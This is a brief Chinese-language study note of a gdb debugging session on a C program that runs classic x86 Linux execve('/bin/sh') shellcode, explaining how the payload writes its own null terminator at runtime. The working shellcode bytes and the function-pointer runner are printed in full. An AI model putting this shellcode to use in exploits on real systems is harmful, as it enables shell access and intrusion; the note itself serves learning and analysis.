[root@localhost ceshi]# gdb shellcode
GNU gdb Fedora (6.8-27.el5)
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) l
1 #include <stdio.h>
2
3 static char shellcode[]=
4 "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
5 "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
6 "\x2f\x73\x68\x58";
7
8 int main() {
9 (*(void(*)())shellcode)();
10 return 0;
(gdb)
加断点在shellcode部分,并使用汇编方式来调试,即display /i $pc
(gdb) b 9
Breakpoint 1 at 0x8048365: file shellcode.c, line 9.
(gdb) display /i $pc
(gdb) run
Starting program: /root/ceshi/shellcode
Breakpoint 1, main () at shellcode.c:9
9 (*(void(*)())shellcode)();
1: x/i $pc
0x8048365 <main+17>: mov $0x8049580,%eax
(gdb)
末尾从2F开始,这里面2F 62 69 6E 2F 73 68 对应着 / b i n / sh,应该末尾还有个00,但是这边放的是58,不是00,那要怎么进行呢?shellcode里不能直接放0x00,通过动态调试可以发现这里就是通过mov [esi+0x7],al这条指令来是58置为00的。这样子/bin/sh就完整了。
分析结束,初次分析shellcode,很多不会,需要进一步学习。
好好学习,天天向上。